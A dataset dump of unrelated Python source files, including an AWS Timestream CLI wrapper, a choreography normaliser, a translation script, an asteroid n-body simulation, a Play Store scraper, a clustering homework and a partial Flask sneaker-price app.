+{"seq_id":"613876808","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/delete-table.html\nif __name__ == '__main__':\n \"\"\"\n\tcreate-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/create-table.html\n\tdescribe-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/describe-table.html\n\tlist-tables : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/list-tables.html\n\tupdate-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/update-table.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # database-name : The name of the database where the Timestream database is to be deleted.\n # table-name : The name of the Timestream table to be deleted.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"timestream-write\", \"delete-table\", \"database-name\", \"table-name\", add_option_dict)\n","sub_path":"timestream-write_write_2/table_delete.py","file_name":"table_delete.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"33825550","text":"from copy import copy\nfrom sympy import S\nfrom minimize import *\nfrom parser_chor import *\nfrom ast_chor import *\nfrom ast_proj import *\nimport logging\n\nlog = logging.getLogger(\"Normalization\")\n\ndef removeForkJoin(nameGen, choreography, state_to_node):\n # if there are nested forks then we should work inside out\n def noForkBeforeJoin(state, first = True):\n node = state_to_node[state]\n if isinstance(node, Fork) and not first:\n return False\n elif isinstance(node, Join):\n return True\n else:\n return all([noForkBeforeJoin(s, False) for s in node.end_state])\n # find the predecessor of a state\n def findPred(state):\n for node in state_to_node.values():\n if isinstance(node, GuardedChoice):\n for i, val in enumerate(node.guarded_states):\n if val.id == state:\n return node, i\n else:\n for i, val in enumerate(node.end_state):\n if val == state:\n return node, i\n def findMp(state):\n node = state_to_node[state]\n if isinstance(node, Motion):\n return [state]\n else:\n return [ s for succ in node.end_state for s in findMp(succ) ]\n def hasAction(state, first = True):\n node = state_to_node[state]\n if isinstance(node, Motion):\n return True\n elif isinstance(node, SendMessage) or isinstance(node, GuardedChoice) or isinstance(node, ReceiveMessage):\n return True\n elif isinstance(node, Join):\n return first\n else:\n return any(hasAction(s, False) for s in node.end_state)\n # pull together the motion primitives\n # takes a list of threads and generate the permutation of events\n # TODO diverge in case of loop within fork-join\n def mergeThreads(pred, pred_index, pendingMotion, states):\n log.debug(\" pred: %s @ %s\", pred, pred_index)\n log.debug(\" states: %s\", states)\n log.debug(\" pendingMotion: %s\", pendingMotion)\n states = [ s for s in states if hasAction(s) ]\n log.debug(\" relevant states: %s\", states)\n #first step categorise the next event\n internal = []\n external = []\n motion = []\n send = []\n receive = []\n join = []\n merge = []\n for s in states:\n node = state_to_node[s]\n if isinstance(node, GuardedChoice):\n internal.append(s)\n elif isinstance(node, ExternalChoice):\n external.append(s)\n elif isinstance(node, Motion):\n motion.append(s)\n elif isinstance(node, SendMessage):\n send.append(s)\n elif isinstance(node, ReceiveMessage):\n receive.append(s)\n elif isinstance(node, Merge):\n merge.append(s)\n elif isinstance(node, Join):\n join.append(s)\n else:\n raise Exception(\"mergeThreads: \" + str(node))\n if len( { state_to_node[n].end_state[0] for n in join} ) > 1:\n raise Exception(\"mergeThreads ambiguous join \" + str(join))\n # skip the merge\n if len(merge) > 0:\n merged = list({ m.end_state[0] for m in merge })\n states = internal + external + motion + send + receive + merged + join\n return mergeThreads(pred, pred_index, pendingMotion, states)\n # merge the internal\n if len(internal) > 0:\n #FIXME this does not look right. it should be the combinations ?!? (2ⁿ)\n newIntId = nameGen.get_artificial_name()\n guards = [ g for i in internal for g in i.get_successors(state_to_node) ]\n newInt = GuardedChoice([newInt], guards)\n internal = [newIntId]\n state_to_node[newIntId] = newInt\n # merge the external choices (temporary allow multiple motions in parallel)\n if len(external) + len(receive) + min(1, len(motion)) > 1: #all the motion are 1 choice (TO)\n newExtId = nameGen.get_artificial_name()\n nodes = [ e for n in external for e in state_to_node[n].end_state ] + [ state_to_node[r].start_state[0] for r in receive ] + [ state_to_node[m].start_state[0] for m in motion ]\n newExt = ExternalChoice([newExtId], nodes)\n external = [newExtId]\n receive = []\n motion = []\n state_to_node[newExtId] = newExt\n # check for conflicts\n if len(internal) + len(send) > 0 and len(external) + len(receive) > 0:\n raise Exception(\"mergeThreads, internal/external choice conflit: \" + (internal+send) + \", \" + (external+receive))\n # at that point there is not much choice left, we should be either internal, send, external, or motion\n msgAlternatives = internal + send + external + receive\n assert len(msgAlternatives) <= 2\n if len(msgAlternatives) == 0:\n # not 0-time event, let's move or we are done\n if len(motion) > 0:\n assert len(join) == 0, \"motion \" + str(motion) + \", join \" + str(join)\n motion.extend(pendingMotion)\n #TODO a bit too specialized\n goodOnes = [ m for m in motion if not isPlaceholderMp(state_to_node[m].motions[0]) ]\n assert len(goodOnes) == 1, \"no real motion: \" + str(motion)\n mp = copy(state_to_node[goodOnes.pop()])\n newId = nameGen.get_artificial_name()\n mp.start_state[0] = newId\n pred.end_state[pred_index] = newId\n state_to_node[newId] = mp\n successors = [ end for m in motion for end in state_to_node[m].end_state ]\n return mergeThreads(mp, 0, [], successors)\n else:\n assert len(pendingMotion) == 0\n joinTarget = { state_to_node[n].end_state[0] for n in join}\n assert len(joinTarget) == 1\n return [(pred, pred_index)], joinTarget.pop()\n elif len(msgAlternatives) == 1:\n a = state_to_node[msgAlternatives.pop()]\n log.debug(\" next (unique) action: %s\", a)\n a2 = copy(a)\n newId = nameGen.get_artificial_name()\n a2.start_state[0] = newId\n state_to_node[newId] = a2\n #update the predecessor\n pred.end_state[pred_index] = newId\n if isinstance(pred, GuardedChoice):\n pred.guarded_states[pred_index].id = newId\n # continue with the rest ...\n acc = []\n joinAt = None\n pendingMP = pendingMotion\n if isinstance(a2, ExternalChoice):\n mpId = [ s for s in a2.end_state if isinstance(state_to_node[s], Motion) ]\n if len(mpId) > 1:\n reprMP = mpId.pop()\n a2.end_state = [ s for s in a2.end_state if not isinstance(state_to_node[s], Motion) ].append(mpId)\n pendingMP.extend(mpId)\n for i, e in enumerate(a2.end_state):\n lst, j = mergeThreads(a2, i, pendingMP, motion + [e] + join)\n acc.extend(lst)\n if joinAt is None:\n joinAt = j\n else:\n assert(joinAt == j)\n return acc, joinAt\n else:\n # new choice\n newId = nameGen.get_artificial_name()\n choice = GuardedChoice([newId], [GuardArg(S.true(), newId) for x in msgAlternatives])\n state_to_node[newId] = choice\n #update the predecessor\n pred.end_state[pred_index] = newId\n if isinstance(pred, GuardedChoice):\n pred.guarded_states[pred_index].id = newId\n # one action\n acc = []\n joinAt = None\n for i, a in msgAlternatives:\n remaining = copy(msgAlternatives).pop(i)\n a2 = copy(state_to_node[a])\n newId2 = nameGen.get_artificial_name()\n a2.start_state[0] = newId2\n state_to_node[newId2] = a2\n choice.end_state[i] = newId2\n choice.guarded_states[i].id = newId2\n pendingMP = pendingMotion\n # if next is motion (receive) only one time thing\n if isinstance(a2, ExternalChoice):\n mpId = [ s for s in a2.end_state if isinstance(state_to_node[s], Motion) ]\n if len(mpId) > 1:\n reprMP = mpId.pop()\n a2.end_state = [ s for s in a2.end_state if not isinstance(state_to_node[s], Motion) ].append(mpId)\n pendingMP.extend(mpId)\n # continue with the rest ...\n for i, e in enumerate(a2.end_state):\n # in case of timee, ignore the non-time events\n if isinstance(a2, ExternalChoice) and isinstance(state_to_node[e], Motion):\n remaining = [ mp for r in remaining for mp in findMp(r) ]\n lst, j = mergeThreads(a2, i, pendingMP, remaining + motion + [e] + join)\n acc.extend(lst)\n if joinAt is None:\n joinAt = j\n else:\n assert(joinAt == j)\n log.debug(\" next choice action: %s\", choice)\n return acc, joinAt\n # get the fork we need to remove\n forks = [ state for (state, node) in state_to_node.items() if isinstance(node, Fork) ]\n # the non-nested ones\n nonNestedFork = [ s for s in forks if noForkBeforeJoin(s) ]\n while len(forks) > 0:\n assert len(nonNestedFork) > 0\n for s in nonNestedFork:\n pred, idx = findPred(s)\n lastIds, join = mergeThreads(pred, idx, [], state_to_node[s].end_state)\n log.debug(\" connecting %s to %s\", lastIds, join)\n # replace the last join by a merge is needed\n if len(lastIds) == 1:\n last, idx = lastIds.pop()\n last.end_state[idx] = join\n else:\n merge = Merge([], [join])\n for pred, index in lastIds:\n newId = sefl.get_artificial_name()\n pred.end_state[index] = newId\n merge.start_state.append(newId)\n # update work list\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"after processing: %s\", nonNestedFork)\n for v in state_to_node.values():\n log.debug(\"%s\", v)\n forks = [ s for s in forks if not s in nonNestedFork ]\n nonNestedFork = [ s for s in forks if noForkBeforeJoin(s) ]\n # remove unreachable node\n removeUnreachable(choreography, state_to_node)\n\n#to make our life simpler, let us add an external choice before every receive\ndef addExternalChoice(nameGen, choreography, state_to_node):\n recv = [ node.start_state[0] for node in choreography.statements if isinstance(node, ReceiveMessage) ]\n needChoice = [ node for node in choreography.statements if not isinstance(node, ExternalChoice) and any(n in recv for n in node.end_state) ]\n for node in needChoice:\n for i, succ in enumerate(node.end_state):\n if succ in recv:\n name = nameGen.get_artificial_name()\n newExt = ExternalChoice([name], [succ])\n state_to_node[name] = newExt\n choreography.statements.add(newExt)\n node.end_state[i] = name\n if isinstance(node, GuardedChoice):\n node.guarded_states[i].id = name\n","sub_path":"pgcd/nodes/verification/choreography/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":11694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"296335034","text":"# using https://pypi.python.org/pypi/googletrans\n# pip install googletrans\n\nimport sys\nimport shutil\nfrom googletrans import Translator\nfrom datetime import datetime\ntranslator = Translator()\n\n\"\"\"\nFILE HANDLES\n\"\"\"\nlanguageList = [line.rstrip() for line in open(\"./languages.ykv\")]\njsonData= [line.rstrip() for line in open(sys.argv[1])]\n\nprint(jsonData)\n\nlog = open(\"./worklog.ykv\",\"w\");\n# print(languageList);\n# print(jsonData);\nprint(\"***********************************************************\\n\\n\");\nprint(\" TRANSLATING BOT APPLICATION \\n\");\nprint(\" https://github.com/yashkumarverma/\\n\\n\")\nprint(\"***********************************************************\");\n\nlog.write(\"***********************************************************\\n\\n\");\nlog.write(\" TRANSLATING SUSI AI CHAT APPLICATION \\n\");\nlog.write(\" https://github.com/yashkumarverma/\\n\\n\")\nlog.write(\"***********************************************************\");\n\n\"\"\"\nTRANSLATE ITEMS\n\"\"\"\nfor language in languageList:\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Working on language : \"+language+\"\\n\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" started\\n\")\n\t\n\t# translate\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" started\");\n\ttranslations = translator.translate(jsonData, dest=str(language));\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\\n\");\n\t\n\t# create json, build file and save\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to json for \" + language + \" started\");\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"Export to json for \" + language + \" started\");\n\tjsonFile = open(\"build/\"+language+\".json\",\"w\",encoding=\"utf8\");\n\tjsonRender = \"{\";\n\tfor translation in translations:\n\t\tjsonRender= jsonRender+'\"'+translation.origin+'\":'+'\"'+translation.text+'\",';\n\tjsonRender = jsonRender[:-1]\n\tjsonRender += \"}\";\n\tjsonFile.write(jsonRender);\n\tjsonFile.close();\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"Export to json for \" + language + \" completed\");\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to json for \" + language + \" completed\");\n\n\t# write logs\n\tprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed\");\t\n\tlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Translation to \" + language + \" completed \\n --- \\n\")\n\nprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Export to zip ...\");\nlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"starting zip export\");\n# creating zip\nshutil.make_archive(\"translated\", \"zip\", \"build\")\nlog.write(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"zip export complete\");\nprint(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")+\"|\\t\\t\"+\"Everything Done.\");\n\nprint(\"***********************************************************\\n\\n\");\nprint(\" Converted Application to 102 Languages \\n\");\nprint(\" Original Work of Yash Kumar Verma \\n\\n\")\nprint(\"***********************************************************\");\n\nlog.write(\"***********************************************************\\n\\n\");\nlog.write(\" Converted Application to 102 Languages \\n\");\nlog.write(\" Original Work of Yash Kumar Verma \\n\\n\")\nlog.write(\"***********************************************************\");\n\nlog.close();","sub_path":"agri/platforms/android/app/src/main/assets/www/scripts/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201181644","text":"\"\"\"\nRuns n-body simulation of asteroids to see how close they approach Earth\n\n*More information in the README.md\n\n\"\"\"\n\n__author__ = \"John D. Hefele\"\n__email__ = \"jdavidhefele@gmail.com\"\n\nfrom amuse.lab import *\nfrom make_ss_1925 import *\nimport numpy as np\nimport os\n\n\ndef integrate_forward(pn_input,pn_output,dir_data,dt=0.02,total_t=500.):\n\n #Variables to alter\n max_asteroids=200\n dt= dt |units.yr\n total_t=total_t |units.yr\n\n #For setting printing options\n np.set_printoptions(linewidth=400, threshold=int(1e4), edgeitems=6)\n\n #Loads names of target asteroids\n asteroid_names=open(pn_input,'r')\n obj_name=asteroid_names.read().splitlines()\n obj_num=[]\n for i,row in enumerate(obj_name):\n #if i>0:\n split=row.strip('\\n').split('\\t')\n number=int(split[0])\n obj_num.append(number)\n num_asteroids=len(obj_num)\n if num_asteroids>max_asteroids:\n print('Running more than 200 asteroids at once will be slow!')\n\n print (obj_num)\n\n #Loads all asteroids coordinates\n fil_asteroid_coord=os.path.join(dir_data,'cart_asteroids.csv')\n print('Loading asteroid coordinates...')\n loaded_coords=np.genfromtxt(fil_asteroid_coord,delimiter=',')\n print('Done!')\n\n #Resets time and row number\n row_num=0\n t = 0 |units.yr\n\n #Initialize mercury\n converter = nbody_system.nbody_to_si(1.0 |units.MSun, 1.0 |units.AU)\n mer = Huayno(converter)\n mer.parameters.timestep = 0.05 |units.yr #Sets the initial timestep\n mer.initialize_code()\n\n #Creates the solar system and adds it to mercury\n ss=make_solar_system_1925(dir_data)\n mer.particles.add_particles(ss)\n\n #Find objects and sorts by epoch\n found_obj=[]\n for i,num in enumerate(obj_num):\n found_object=loaded_coords[np.where(loaded_coords[:,0] == num)]\n found_object.resize(found_object.size)\n found_obj.append(found_object) \n object_matrix=np.array(found_obj)\n object_matrix=object_matrix[object_matrix[:,1].argsort()]\n\n #Integrates planets and objects forward\n num_added=0\n last_number=0\n int_names=[]\n x_values=[]; y_values=[]; z_values=[]\n full=False\n print('Adding asteroids to simulations...')\n while t < total_t:\n epoch=t.number+2424151.5\n mer.evolve_model(t)\n if t.number<95.:\n x=mer.particles.x.value_in(units.AU)\n y=mer.particles.y.value_in(units.AU)\n z=mer.particles.z.value_in(units.AU)\n sun_pos=[x[0],y[0],z[0]]\n if num_added==num_asteroids and full==False:\n print('All asteroids added!')\n full=True\n while num_added=epoch:\n new_object = Particles(1)\n new_object.position= object_matrix[row_num,2:5]+sun_pos |units.AU\n new_object.velocity= object_matrix[row_num,5:8] |units.kms\n new_object.mass = 1.0e-6 | units.g # masses are negligible compared to Sun and planets, so we mostly ignore their\n # effects. Their own dynamics of course do not depend on it, so we set it to a negligible number\n # (1 micro gram)\n mer.particles.add_particles(new_object)\n int_names.append(object_matrix[row_num,0])\n row_num+=1\n num_added+=1\n else:\n break\n t+=dt\n else:\n x_values.append(mer.particles.x.value_in(units.AU))\n y_values.append(mer.particles.y.value_in(units.AU))\n z_values.append(mer.particles.z.value_in(units.AU))\n t+=dt\n if int(t.number%50)==0 and int(t.number)!=last_number:\n print('%s of out of %s years integrated...'%(int(t.number),int(total_t.number)))\n \n last_number=int(t.number)\n print('Simulation complete!')\n\n #Closes down mercury\n mer.cleanup_code()\n mer.stop()\n\n x_matrix=np.array(x_values)\n y_matrix=np.array(y_values)\n z_matrix=np.array(z_values)\n num_steps,_=x_matrix.shape\n\n #Create a matrix of earth positions\n earth_positions=np.zeros((num_steps,3)) \n earth_positions[:,0]=x_matrix[:,3] \n earth_positions[:,1]=y_matrix[:,3] \n earth_positions[:,2]=z_matrix[:,3]\n\n #Creates matrices for each asteroid\n num_planets=int(10)\n asteroid_matrices=[]\n for i in range(num_asteroids):\n asteroid_positions=np.zeros((num_steps,3))\n asteroid_positions[:,0]=x_matrix[:,i+num_planets] \n asteroid_positions[:,1]=y_matrix[:,i+num_planets] \n asteroid_positions[:,2]=z_matrix[:,i+num_planets]\n asteroid_matrices.append(asteroid_positions)\n\n #Find minimum distance\n print('Appending objects to file %s'%(pn_output))\n output=open(pn_output,'a')\n for i in range(num_asteroids):\n min_distance=10000000\n for j in range(num_steps):\n distance=np.linalg.norm(earth_positions[j]-asteroid_matrices[i][j])\n if distance https://play.google.com/store/search?q=social&c=apps&price=1&rating=0&gl=ie\r\n# 2nd URL => https://play.google.com/store/search?q=social&c=apps&price=2&rating=0&gl=ie\r\n# 3rd URL => https://play.google.com/store/apps/category/SOCIAL/collection/topselling_free?gl=ie\r\n\r\ndriver.get('https://play.google.com/store/search?q=social&c=apps&price=2&hl=en&gl=ie')\r\n\r\nmatch=False\r\nlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\nwhile match ==False:\r\n\ttry:\r\n\t\tlastCount = lenOfPage\r\n\t\tdriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\t\r\n\t\ttime.sleep(2)\r\n\t\tlenOfPage = driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);var lenOfPage=document.body.scrollHeight;return lenOfPage;\")\r\n\t\tif lastCount==lenOfPage:\r\n\t\t\tmatch=True\r\n\t\tmore_button = driver.find_element_by_xpath('//*[@id=\"show-more-button\"]')\r\n\t\tmore_button.click()\r\n\r\n\texcept:\r\n\t\tcontinue\r\n\r\ncsv_file = open('social_paid.csv', 'w')\r\nwriter = csv.writer(csv_file)\r\n\r\napp_urls = driver.find_elements_by_xpath('.//a[@class = \"title\"]')\r\nprint (len(app_urls))\r\n\r\napp_urls_1 = [x.get_attribute('href') for x in app_urls]\r\n\r\nfor url in app_urls_1:\r\n\tdriver.get(url)\r\n\r\n\r\n\tapp_info= {}\r\n\r\n\r\n\tif driver.find_element_by_xpath('.//span[2][@class = \"T32cc UAO9ie\"]/a').text == 'Social':\r\n\t\tname = driver.find_element_by_xpath('.//h1[@class = \"AHFaub\"]/span').text\r\n\t\tcategory = driver.find_element_by_xpath('.//span[2][@class = \"T32cc UAO9ie\"]/a').text\r\n\t\tdeveloper = driver.find_element_by_xpath('.//span[1][@class = \"T32cc UAO9ie\"]/a').text\r\n\t\ttry:\r\n\t\t\tads = driver.find_element_by_xpath('.//div[@class = \"rxic6\"]').text\r\n\t\texcept:\r\n\t\t\tads = \"\"\r\n\t\ttry:\r\n\t\t\tnumberOfreviews = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath(\".//span[@class = 'AYi5wd TBRnV']/span\").get_attribute('aria-label')).group(0)\r\n\t\texcept:\r\n\t\t\tnumberOfreviews = \"\"\r\n\r\n\t\tif numberOfreviews != \"\":\r\n\t\t\ttry:\r\n\t\t\t\trating = re.search(r'\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[@class = \"pf5lIe\"]/div').get_attribute('aria-label')).group(0)\r\n\t\t\texcept:\r\n\t\t\t\trating = \"\"\r\n\t\telse:\r\n\t\t\trating = \"\"\r\n\r\n\t\ttry: \r\n\t\t\tif re.search('.k', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text) !=None:\r\n\t\t\t\tsize = int((re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0).replace(',','')))/1000\r\n\t\t\telif re.search('.M', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text) != None:\r\n\t\t\t\tsize = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\.?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\telse:\r\n\t\t\t\tsize = \"\"\r\n\t\texcept:\r\n\t\t\tsize = \"\"\r\n\r\n\t\tif size != \"\" or re.search(r'[a-z]', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0) !=None:\r\n\t\t\ttry:\r\n\t\t\t\tinstalls = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath('.//div[4]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\texcept:\r\n\t\t\t\tinstalls = \"\"\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tinstalls = re.search(r'\\d*\\,*\\d*\\,+\\d*|\\d*\\,?\\d+', driver.find_element_by_xpath('.//div[3]/span[@class = \"htlgb\"]/div/span').text).group(0)\r\n\t\t\texcept:\r\n\t\t\t\tinstalls = \"\"\t\r\n\r\n\t\ttry:\r\n\t\t\tprice = re.search(r'\\d*\\.?\\d+', driver.find_element_by_xpath('.//span[@class = \"oocvOe\"]/button').get_attribute('aria-label')).group(0)\r\n\t\texcept:\r\n\t\t\tprice = \"\"\r\n\telse:\r\n\t\tcontinue\r\n\t\t\r\n\r\n\tapp_info['name'] = name\r\n\tapp_info['category'] = category\r\n\tapp_info['developer'] = developer\r\n\tapp_info['ads'] = ads\r\n\tapp_info['rating'] = rating\r\n\tapp_info['numberOfreviews'] = numberOfreviews\r\n\tapp_info['size'] = size\r\n\tapp_info['installs'] = installs\r\n\tapp_info['price'] = price\r\n\twriter.writerow(app_info.values())\r\n\r\n\r\ncsv_file.close()\r\ndriver.close()","sub_path":"SOCIALExtraction.py","file_name":"SOCIALExtraction.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"447484584","text":"import sys \n\ndef sum_lines():\n for line in sys.stdin:\n line = line.strip()\n print(line)\n tokens = line.split()\n print(tokens)\n print('Length: ',len(tokens))\n total = 0 \n for num in tokens:\n num = float(num)\n total = total + num \n print('Total: ',total)\n print('Average: ',total/len(tokens))\n\n\nsum_lines()\n\n","sub_path":"sum_line.py","file_name":"sum_line.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"373933876","text":"import skimage\nimport numpy as np\nimport csv\nimport time\nimport sys\nfrom skimage import data\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\n\n\ndef parsingTestCase(path):\n\tprint('=== parsing file from %s ===' % path)\n\tfilename = []\n\tindex = -1\n\n\ttext = open(path, 'r', encoding = 'big5')\n\trows = csv.reader(text, delimiter = ',')\n\n\tfor r in rows:\n\t\tif index != -1:\n\t\t\tfilename.append([])\n\t\t\tfor i in range(len(r)):\n\t\t\t\tfilename[index].append( int(r[i]) )\n\n\t\tindex += 1\t\n\n\tfilename = np.array(filename)\n\treturn filename\n\n\ndef loadImage(path, num):\n\timageArray = np.load(path)\n\tprint('orginal dimension ', imageArray.shape)\n\n\tpca = PCA(n_components=num, copy=False, whiten=True, svd_solver='full')\n\tnewData = pca.fit_transform(imageArray) \n\tprint('reduced dimension ' , newData.shape)\n\treturn newData\n\ndef clustering(data):\n\tkmeans = KMeans(n_clusters=2, random_state=100).fit(data)\n\tcount = 0\n\tfor i in range(len(kmeans.labels_)):\n\t\tif kmeans.labels_[i] == 0:\n\t\t\tcount += 1\n\n\tprint('class 0: %i | class 1: %i' % (count, len(kmeans.labels_)-count))\n\treturn kmeans.labels_\n\ndef tsneReduce(reduced_data):\n\ttime_start = time.time()\n\ttsne = TSNE(n_components=2, verbose=1, perplexity=50, n_iter=300)\n\ttsne_results = tsne.fit_transform(reduced_data)\n\ttime_end = time.time()\n\tprint('total used time: {}'.format(time_start - time_end))\n\treturn tsne_results\n\ndef prediction(Label, test):\n\tresult = []\n\tone_c = 0\n\tzero_c = 0\n\tfor i in range(len(test)):\n\t\tresult.append([])\n\t\tresult[i].append(i)\n\t\tindex1 = test[i][1]\n\t\tindex2 = test[i][2]\n\t\tif Label[index1] != Label[index2]:\n\t\t\tresult[i].append(0)\n\t\t\tzero_c += 1\n\t\telse:\n\t\t\tresult[i].append(1)\n\t\t\tone_c += 1\n\tprint('zero count: %i| one count: %i' % (zero_c, one_c))\n\treturn result\n\ndef outputAns(result, file):\n\ttext = open(file, \"w+\")\n\ts = csv.writer(text, delimiter=',', lineterminator='\\n')\n\ts.writerow([\"id\",\"Ans\"])\n\tfor i in range(len(result)):\n\t\ts.writerow(result[i]) \n\ttext.close()\n\t\n\nif __name__ == '__main__':\n\treducedData = loadImage(sys.argv[1], 400)\n\t# Label = tsneReduce(reducedData)\n\tLabel = clustering(reducedData)\n\tTestCase = parsingTestCase(sys.argv[2])\n\tresult = prediction(Label, TestCase)\n\toutputAns(result, sys.argv[3])\n\t\n","sub_path":"hw4/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"98285323","text":"#################\n#### imports ####\n#################\n \nfrom flask import render_template, Blueprint, request, redirect, url_for, flash\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import secure_filename\nimport os\nimport pickle\n\nfrom project import db, app\nfrom project.models import Sneaker, User\nfrom .forms import AddSneakerForm, EditSneakerForm, PredPriceForm\nfrom .vectorizer import concat_features\n\n\ncur_dir = os.path.dirname(__file__)\nclf5 = pickle.load(open(os.path.join(cur_dir, 'objects', 'classifier5.pkl'), 'rb'))\n\n################\n#### config ####\n################\n \nsneakers_blueprint = Blueprint('sneakers', __name__)\n \nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n##########################\n#### helper functions ####\n##########################\n\ndef flash_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(u\"Error in the %s field - %s\" % (\n getattr(form, field).label.text,\n error\n ), 'info')\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n\ndef classify(retail_price, img_name, text):\n\n X = concat_features(retail_price, img_name, text)\n y = clf5.predict(X)\n proba = clf5.predict_proba(X).max()\n\n if y == 'lv0':\n price_min = retail_price - 10000\n pred = 'Less than {} JPY'.format(price_min)\n elif y == 'lv1':\n price_min = retail_price - 10000\n price_max = retail_price - 2500\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv2':\n price_min = retail_price - 2500\n price_max = retail_price + 2500\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv3':\n price_min = retail_price + 2500\n price_max = retail_price + 10000\n pred = '{} - {} JPY'.format(price_min, price_max)\n elif y == 'lv4':\n price_max = retail_price + 10000\n pred = 'More than {} JPY'.format(price_max)\n\n return pred, proba\n\n\n################\n#### routes ####\n################\n \n@sneakers_blueprint.route('/')\ndef public_sneakers():\n all_public_sneakers = Sneaker.query.filter_by(is_public=True)\n return render_template('public_sneakers.html', public_sneakers=all_public_sneakers)\n\n\n@sneakers_blueprint.route('/add', methods=['GET', 'POST'])\n@login_required\ndef add_sneaker():\n # Cannot pass in 'request.form' to AddRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause AddRecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = AddSneakerForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n # check if the post request has the recipe_image part\n if 'sneaker_image' not in request.files:\n flash('No sneaker image provided!')\n return redirect(request.url)\n\n file = request.files['sneaker_image']\n\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n\n if not file:\n flash('File is empty!')\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n filepath = os.path.join(app.config['UPLOADS_DEFAULT_DEST'], filename)\n file.save(filepath)\n url = os.path.join(app.config['UPLOADS_DEFAULT_URL'], filename)\n else:\n filename = ''\n url = ''\n\n name = form.sneaker_model_name.data\n price = form.sneaker_retail_price.data\n\n new_sneaker = Sneaker(name, 